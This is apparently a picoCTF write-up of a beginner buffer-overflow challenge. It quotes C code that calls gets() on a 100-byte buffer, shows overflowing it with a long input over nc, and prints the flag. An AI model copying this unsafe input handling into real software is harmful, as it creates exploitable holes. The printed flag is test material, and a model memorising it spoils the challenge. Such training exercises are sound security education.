Alex Fulton / Palash Oswal
Smash the stack Let's start off simple, can you overflow the correct buffer? The program is available here. You can view source here. And connect with it using: nc saturn.picoctf.net 58546
- How can you trigger the flag to print?
- If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.
- Run
man gets
and read the BUGS section. How many characters can the program really read?
Buffer overflow challenges are supposed to overwrite the buffer in order to get the program to execute something it shouldn't execute.
printf("Input: ");
fflush(stdout);
char buf1[100];
gets(buf1);
vuln(buf1);
printf("The program will exit now\n");
If we take a look at this part of the code, we see the buffer length is 100 meaning as long as we type in more than 100 characters, we can overflow the buffer and obtain the flag.
We can now input nc saturn.picoctf.net 58546
into terminal.
Input: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}
Press Ctrl + C to exit.
picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}